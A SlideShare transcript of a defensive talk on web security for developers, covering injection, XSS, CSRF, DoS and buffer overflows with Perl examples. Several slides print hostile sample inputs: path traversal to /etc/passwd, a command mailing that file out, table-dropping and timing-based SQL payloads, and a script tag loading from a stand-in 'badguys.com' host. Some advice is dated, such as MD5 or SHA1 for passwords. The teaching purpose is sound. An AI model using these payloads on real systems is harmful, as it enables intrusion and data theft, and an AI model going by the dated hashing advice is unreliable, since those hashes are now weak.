SlideShare una empresa de Scribd logo

Web Security 101 for Developers

Michael Peters
Michael Peters

This talk walks through the basics of web security without focussing too much on the particular tools that you choose. The concepts are universal, although most examples will be in Perl. We'll also look at various attack vectors (SQL Injection, XSS, CSRF, and more) and see how you can avoid them. Whether you're an experienced web developer (we all need reminding) or just starting out, this talk can help avoid being the next easy harvest of The Bad Guys.

Tecnología
1 de 47
Descargar para leer sin conexión
Web Security 101 Michael Peters Plus Three, LP
Web Security 101 (for developers) Michael Peters Plus Three, LP
You Do Not Control The Client ●All Input is EVIL! ● URLs ● GET/POST parameters ● Cookies ● HTTP Headers ●Client-side security can be by-passed ● Although there are cases where it's important (like DOM Based XSS attacks) ●Be strict on validation. White list, don't black list. ●There are no easy solutions. Security needs to be everywhere.
Know Your Tools ●Each language is different and has different strengths and weaknesses ● yes, some languages are weaker than others How abstract are your tools? ● ● Code generation or compilation? ● Do you trust the security track record of your vendor?
Kinds of Attacks Code Injection ● ● system commands ● SQL ● HTML ● Javascript ●Cross Site Scripting (XSS) ●Cross Site Request Forgery (CSRF) ●Denial of Service (DOS) ●Buffer Overflows
Code Injection System Commands Creating filenames based on user input my $user_id = $q->param('user_id'); my $pic = "/some/path/pictures/$user_id.jpg"; open(PIC, ">$pic"); print ...
Code Injection System Commands Creating filenames based on user input my $user_id = $q->param('user_id'); my $pic = "/some/path/pictures/$user_id.jpg"; open(PIC, ">$pic"); print ... ?user_id=..%2F..%2F..%2Fetc%2Fpasswd
Code Injection System Commands Creating filenames based on user input my $user_id = $q->param('user_id'); my $pic = "/some/path/pictures/$user_id.jpg"; open(PIC, ">$pic"); print ... ?user_id=../../../etc/passwd
Code Injection System Commands Using user input in system commands In Perl, system commands are executed using system(), exec(), ``, qx() and sometimes even with open() In PHP, system commands are executed using system(), exec(), ``, passthru(), popen(), pcntl_exec() $user_id = $_POST{'user_id'}; $pic = "/some/path/pictures/$user_id.jpg"; if (`ls $pic`) { ... }
Code Injection System Commands Using user input in system commands In Perl, system commands are executed using system(), exec(), ``, qx() and sometimes even with open() In PHP, system commands are executed using system(), exec(), ``, passthru(), popen(), pcntl_exec() $user_id = $_POST{'user_id'}; $pic = "/some/path/pictures/$user_id.jpg"; if (`ls $pic`) { ... } ?user_id=;sendmail mpeters@plusthree.com < /etc/passwd
Code Injection System Commands Filenames: Strip out any “upwards” paths, and make sure that files are relative to a safe “root” (not the filesystem root or even your document root). my $path = $q->param('path'); $path = File::Spec->no_upwards($path); my $pic = "/some/path/pictures/$path.jpg";
Code Injection System Commands Anything else: Be strict on validating what you're passing. ●If it's a numeric flag, make sure it's numeric. ●If it's string, make sure it's a valid option, validate length, etc.
Code Injection System Commands Bonus: Perl's taint mode ●Using -T or PerlTaintCheck On in mod_perl ●Automatically prevents any outside data making it's way into a system command without being specifically untainted by the developer ●Not a magic bullet, but a very good safety net.
SQL Injection Assembling Queries Similar to Code Injection attacks, this attack relies on the developer using some user input as part of an SQL query. my $search = $q->param('search'); my $sql = "SELECT * FROM clients WHERE name = '$search'";
SQL Injection Assembling Queries Similar to Code Injection attacks, this attack relies on the developer using some user input as part of an SQL query. my $search = $q->param('search'); my $sql = "SELECT * FROM clients WHERE name = '$search'"; Can be used to delete data ?search=';DROP ALL TABLES
SQL Injection Assembling Queries Similar to Code Injection attacks, this attack relies on the developer using some user input as part of an SQL query. my $search = $q->param('search'); my $sql = "SELECT * FROM clients WHERE name = '$search'"; Can be used to corrupt data ?search=';UPDATE clients SET name=blah
SQL Injection Assembling Queries Similar to Code Injection attacks, this attack relies on the developer using some user input as part of an SQL query. my $search = $q->param('search'); my $sql = "SELECT * FROM clients WHERE public = 1 AND name = '$search'"; Can be used to steal data ?search=foo' OR public = 0
SQL Injection Assembling Queries SQL Injection attacks can even be used in places where the data results aren't shown to the user. my $user = $q->param('username'); my $sql = "SELECT password FROM users WHERE username = '$user'"; Using a "timing" attack we can see how long the queries take to return ?user=' UNION SELECT IF(username LIKE 'a%',SLEEP(3),null) FROM user WHERE user_id=1 In about 30 tries an attacker could get the a user's password
SQL Injection Assembling Queries Don't try and escape user input ●See PHP's magic_quotes() vs addslashes() vs mysql_escape_string() vs mysql_real_escape_string() ●It's error prone, it's hard to get right. Always use "bind" variables in your DB library my $user = $q->param('username'); my $sql = "SELECT password FROM users WHERE username = ?"; my $sth = $dbh->prepare($sql); $sth->execute($user);
SQL Injection Assembling Queries Sometimes you can't always use bind variables. In these rare cases, be extremely strict in your validation. $limit = $q->param('limit'); $limit = 10 unless $limit =~ /^d+$/ || $limit > 50; my $sql = "SELECT * FROM users WHERE first_name = ? LIMIT $limit"; my $sth = $dbh->prepare($sql);
SQL Injection ORMs, Libraries, etc Just because you are using an ORM or other library to assemble your SQL doesn't mean you can turn off your brain: use SQL::Abstract; my $sql = SQL::Abstract->new(); $sql->where({ public => 1, name => $q->param('search'), });
SQL Injection ORMs, Libraries, etc Just because you are using an ORM or other library to assemble your SQL doesn't make you immune: use SQL::Abstract; my $sql = SQL::Abstract->new(); $sql->where({ public => 1, name => $q->param('search'), }); ?search=blah&search=public&search=0
SQL Injection ORMs, Libraries, etc Just because you are using an ORM or other library to assemble your SQL doesn't make you immune: use SQL::Abstract; my $sql = SQL::Abstract->new(); $sql->where({ public => 1, name => scalar $q->param('search'), }); ?search=blah&search=public&search=0
XSS Cross Site Scripting Injecting Javascript (or other scripts) that will run on behalf of another user. This code usually steals cookies (authenticated credentials) of the person who "sees" the infected web page. <script source="http://badguys.com/stealstuff.js"> </script> Exploits a user's trust of a site. Can be combined with phishing or CSRF to steal all kinds of things.
XSS Cross Site Scripting Any site that takes input from user is subject to XSS. Even if that input isn't shown on any public facing site. ●Comments ●Petition form that shows a list of signatures ●Contact form where the data is stored and shown in an Admin screen. ●Putting data from URL into the HTML
XSS Non-Persistant User finds a way to embed their malicious content temporarily in another web site. Usually as part of a URL. ●Alice sends a specially crafted search engine link to a mailing list. ●Bob posts a malicious link on a company's help forum that a help desk employee clicks on. ●Easy to combine with phishing or social engineering
XSS Persistant User submits mailicious code that then becomes permanently attached to a site. Usually some sort of <script> tag. ●Alice updates her profile on a site with a malicious "description". When her profile is seen by another user it can steal that user's auth credentials. ●Alice's profile information is seen by an admin of the site in some admin interface. This now give's Alice admin credentials. The MySpace worm ●
XSS DOM Based Similar to Non-Persistant XSS, this attack relies on a site having client-side scripting that manipulates the DOM. Unlike the Non- Persistant variety, this attacks client-side security. ●Bob creates a malicious URL for a site that uses JS to insert content into the DOM thus exposing anyone who clicks on that link to credential theft ●Alice's profile information is returned via JSON and inserted into the DOM by a site's JS and exposes users and admins to credential theft.
XSS Common misbelief that user input should be escaped before storing. ●False sense of security because you don't know how this information will be used. ●This causes problems when you want to use this data in a non-HTML context (spreadsheets, pdfs, etc)
XSS Non-HTML User Input User input should be validated when received and escaped when used in output. ●Each field is different and should be carefully validated. Validate the type, the format and the length. ●Output needs to be escaped based on how it's used. HTML, URL, Javascript or CSS escaping.
XSS Non-HTML User Input Perl's HTML::Template as an example <td><tmpl_var first_name escape=html></td> var name = '<tmpl_var first_name escape=js>' <a href="search?first_name= <tmpl_var first_name escape=url>">Search</a> Doesn't currently support CSS escaping (which is tricky to get right, so please avoid putting user content into CSS).
XSS Non-HTML User Input Perl's Template Toolkit as an example <td>[% first_name | html %]</td> <a href="search?first_name= [% first_name | uri %]">Search</a> Doesn't currently support JS escaping ● ● escaping the following characters with a backslash ' " r n ●Doesn't currently support CSS escaping (which is tricky to get right, so please avoid putting user content into CSS).
XSS HTML User Input Avoid accepting HTML input from users whenever possible. But sometimes it's unavoidable. ●Filter the HTML to an acceptable subset ●Whitelist, don't blacklist ● Which elements do you need to support? ● Never accept <script> or <style> elements ● Which attributes do you need to support? ● Never accept on* events, style, javascript: in URLs (src, href, etc) ●Even with a good HTML filter/parser it's still really hard to get right (see MySpace worm).
CSRF Cross Site Request Forgery A malicious site executes some resource on another trusted site that you already have a relationship with. This code is executed in the context (cookies, current authentication, etc) of that trusted site but the user is unaware of the action taken. Exploits a site's trust in it's users. Can also be combined with XSS to eliminate the need for a malicious site. One trusted site is used to attack another trusted site.
CSRF Cross Site Request Forgery Examples: ●By visiting a malicious author's site, his book is added to your Amazon.com shopping cart. ●Visiting a malicious site causes you to send out spam email from your web email service (like gmail, hotmail, etc)
CSRF Cross Site Request Forgery Block important actions (add, delete, update, email, buy, etc) that come from any referrer (HTTP Referer header) that isn't you. Caveats: ●Some earlier versions of flash could be tricked into spoofing HTTP headers (require a newer version) ●IE6 has bugs that prevent the Referer header from being sent all the time (these are rare and strange, and can be worked around).
CSRF Cross Site Request Forgery But can't HTTP headers be faked? Yes, but CSRF requires that the Person using the browser not know that the malicious code is running on their behalf. Users aren't going to fake their own HTTP headers when trying to attack themselves.
CSRF Cross Site Request Forgery Another solution if you can't block by referrer is to use per-user unique tokens on every request that expire periodically. They are added as hidden fields to forms, or extra parameters on URLs. Caveats: ●Really big application change ●Usability is hurt if they expire too quickly. ●Security is hurt if they live too long
DOS Denial of Service Lots of useless requests that overwhelm your system and halt services from legitimate customers. ●Lots of individual requests ●Massing amounts of data in POST requests ●Requests for seldom used, resource intensive URLs
DOS Denial of Service Can usually be defended against by identifying IP addresses and blacklisting. ●Can block at the network level (firewall, router, switch) ●Apache can use mod_security or mod_dosevasive, or both
DDOS Distributed Denial of Service Same as DOS but not coming from a single (or small group) of IP addresses. Lots of machines in lots of different locations. ●Usually involves Botnets or Malware ●You've pissed off the wrong people ●Really hard to defend against. ●Really hard to distinguish from a large spike in legitimate traffic. ●You need some serious hardware and some help from your ISP.
Buffer Overflows Attackers craft malicious requests that cause incoming data to spill out of the bucket the programmer intended it to go. This can let the attacker overwrite existing data and code to be whatever they want. Only a problem when using low level system languages like C or C++. Programmers that use interpreted or VM languages have to trust their implementations to avoid them.
Buffer Overflows Don't write web systems in C (or C++). Sometimes you need to use C for some fast data processing (graphics, xml parsing, etc). Be cautious, use lint tools and try and use a popular open source alternative if you can. If you screw this up it, the consequences can be scary.
Misc Tips Never, ever, ever, ever create your own encryption algorithms. There are too many good, open and verified encryption libraries out there to be stupid enough to try it by yourself. Encryption is hard and I can guarantee you that you aren't smart enough to get it right.
Misc Tips Never, ever, ever, ever store passwords in plain text. Don't even encrypt them. Use a 1-way encoding/ hash like crypt(), MD5 or SHA1. Don't just encode, but use a one time salt/secret to make the hash even more secure. Otherwise you're vulnerable to "rainbow tables".
Misc Tips Never, ever, ever, ever store passwords in plain text. Don't even encrypt them. Use a 1-way encoding/ hash like crypt(), MD5 or SHA1. Don't just encode, but use a one time salt/secret to make the hash even more secure. Otherwise you're vulnerable to "rainbow tables".
Misc Tips Avoid leaking information through your error messages. We've all seen those web pages that show you an error message about some internal problem the server is having. The standard PHP "Can't connect to MySQL" error is everywhere. Use a custom, generic error document that's served when this happens. Not only is it more professional (looks like the rest of your site) but it also prevents attackers from gaining knowledge about your system.

Recomendados

Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
Web security presentation
Web security presentationWeb security presentation
Web security presentationJohn Staveley
 
Web Security: A Primer for Developers
Web Security: A Primer for DevelopersWeb Security: A Primer for Developers
Web Security: A Primer for DevelopersMike North
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the WebMike Crabb
 
Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHPjikbal
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 

Recomendados

Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
Web security presentation
Web security presentationWeb security presentation
Web security presentationJohn Staveley
 
Web Security: A Primer for Developers
Web Security: A Primer for DevelopersWeb Security: A Primer for Developers
Web Security: A Primer for DevelopersMike North
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the WebMike Crabb
 
Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHPjikbal
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012jakobkorherr
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Web Security
Web SecurityWeb Security
Web SecurityAli Habeeb
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super BaitJeremiah Grossman
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 
Brute force
Brute forceBrute force
Brute forcePrajwal Panchmahalkar
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 
Web security leeds sharp dot netnotts
Web security leeds sharp dot netnottsWeb security leeds sharp dot netnotts
Web security leeds sharp dot netnottsJohn Staveley
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encodingEoin Keary
 
Brute Force Attack
Brute Force AttackBrute Force Attack
Brute Force AttackAhmad karawash
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Xss talk, attack and defense
Xss talk, attack and defenseXss talk, attack and defense
Xss talk, attack and defensePrakashchand Suthar
 
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationPresentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationMd Mahfuzur Rahman
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionMichael Hendrickx
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applicationsphanleson
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
Web Security
Web SecurityWeb Security
Web SecurityADIEFEH
 
Web Security
Web SecurityWeb Security
Web SecurityTripad M
 

Más contenido relacionado

La actualidad más candente

Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012jakobkorherr
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 
Web security leeds sharp dot netnotts
Web security leeds sharp dot netnottsWeb security leeds sharp dot netnotts
Web security leeds sharp dot netnottsJohn Staveley
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encodingEoin Keary
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationPresentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationMd Mahfuzur Rahman
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applicationsphanleson
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 

La actualidad más candente (20)

Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Web Security
Web SecurityWeb Security
Web Security
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super Bait
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
 
Brute force
Brute forceBrute force
Brute force
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
 
Web security leeds sharp dot netnotts
Web security leeds sharp dot netnottsWeb security leeds sharp dot netnotts
Web security leeds sharp dot netnotts
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
 
Brute Force Attack
Brute Force AttackBrute Force Attack
Brute Force Attack
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Xss talk, attack and defense
Xss talk, attack and defenseXss talk, attack and defense
Xss talk, attack and defense
 
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationPresentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web Application
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applications
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
 

Destacado

Web Security
Web SecurityWeb Security
Web SecurityADIEFEH
 
Web Security
Web SecurityWeb Security
Web SecurityTripad M
 
Lecture 6 web security
Lecture 6 web securityLecture 6 web security
Lecture 6 web securityrajakhurram
 
Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & TestingDeepu S Nath
 
Introduction to Web security
Introduction to Web securityIntroduction to Web security
Introduction to Web securityjeyaselvir
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security RisksSperasoft
 
Email Security Presentation
Email Security PresentationEmail Security Presentation
Email Security PresentationYosef Gamble
 
Security testing
Security testingSecurity testing
Security testingbaskar p
 
SQL and XPATH Injection with Fusion Lite Insight
SQL and XPATH Injection with Fusion Lite InsightSQL and XPATH Injection with Fusion Lite Insight
SQL and XPATH Injection with Fusion Lite InsightiAppSecure Solutions
 
Email and web security
Email and web securityEmail and web security
Email and web securityshahhardik27
 
Implications of Open Source Software Use (or Let's Talk Open Source)
Implications of Open Source Software Use (or Let's Talk Open Source)Implications of Open Source Software Use (or Let's Talk Open Source)
Implications of Open Source Software Use (or Let's Talk Open Source)Gail Murphy
 
Nullcon Jailbreak CTF 2012,Walkthrough by Team Loosers
Nullcon Jailbreak CTF 2012,Walkthrough by Team LoosersNullcon Jailbreak CTF 2012,Walkthrough by Team Loosers
Nullcon Jailbreak CTF 2012,Walkthrough by Team LoosersAjith Chandran
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Francois Marier
 
ONE Conference: Vulnerabilities in Web Applications
ONE Conference: Vulnerabilities in Web ApplicationsONE Conference: Vulnerabilities in Web Applications
ONE Conference: Vulnerabilities in Web ApplicationsNetcetera
 

Destacado (20)

Web Security
Web SecurityWeb Security
Web Security
 
Web Security
Web SecurityWeb Security
Web Security
 
Lecture 6 web security
Lecture 6 web securityLecture 6 web security
Lecture 6 web security
 
Web Security
Web SecurityWeb Security
Web Security
 
Web security 2012
Web security 2012Web security 2012
Web security 2012
 
Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & Testing
 
Introduction to Web security
Introduction to Web securityIntroduction to Web security
Introduction to Web security
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security Risks
 
Web security
Web securityWeb security
Web security
 
Email Security Presentation
Email Security PresentationEmail Security Presentation
Email Security Presentation
 
Security testing
Security testingSecurity testing
Security testing
 
Network security
Network securityNetwork security
Network security
 
SQL and XPATH Injection with Fusion Lite Insight
SQL and XPATH Injection with Fusion Lite InsightSQL and XPATH Injection with Fusion Lite Insight
SQL and XPATH Injection with Fusion Lite Insight
 
web security
web securityweb security
web security
 
Email and web security
Email and web securityEmail and web security
Email and web security
 
Implications of Open Source Software Use (or Let's Talk Open Source)
Implications of Open Source Software Use (or Let's Talk Open Source)Implications of Open Source Software Use (or Let's Talk Open Source)
Implications of Open Source Software Use (or Let's Talk Open Source)
 
Nullcon Jailbreak CTF 2012,Walkthrough by Team Loosers
Nullcon Jailbreak CTF 2012,Walkthrough by Team LoosersNullcon Jailbreak CTF 2012,Walkthrough by Team Loosers
Nullcon Jailbreak CTF 2012,Walkthrough by Team Loosers
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016
 
ONE Conference: Vulnerabilities in Web Applications
ONE Conference: Vulnerabilities in Web ApplicationsONE Conference: Vulnerabilities in Web Applications
ONE Conference: Vulnerabilities in Web Applications
 
Unit 11 web authoring
Unit 11 web authoringUnit 11 web authoring
Unit 11 web authoring
 

Similar a Web Security 101 for Developers

Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012ZIONSECURITY
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure codingHaitham Raik
 
10 Rules for Safer Code
10 Rules for Safer Code10 Rules for Safer Code
10 Rules for Safer CodeQuang Ngoc
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASPMizno Kruge
 
Security: Odoo Code Hardening
Security: Odoo Code HardeningSecurity: Odoo Code Hardening
Security: Odoo Code HardeningOdoo
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSskyhawk133
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionDaniel Owens
 
10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]Olivier Dony
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Grand Parade Poland
 
Unique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentUnique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentLesa Cote
 

Similar a Web Security 101 for Developers (20)

PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
 
Web Security
Web SecurityWeb Security
Web Security
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
 
10 Rules for Safer Code
10 Rules for Safer Code10 Rules for Safer Code
10 Rules for Safer Code
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASP
 
Security: Odoo Code Hardening
Security: Odoo Code HardeningSecurity: Odoo Code Hardening
Security: Odoo Code Hardening
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSS
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 
10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]
 
ieee
ieeeieee
ieee
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
 
Unique Features of SQL Injection in PHP Assignment
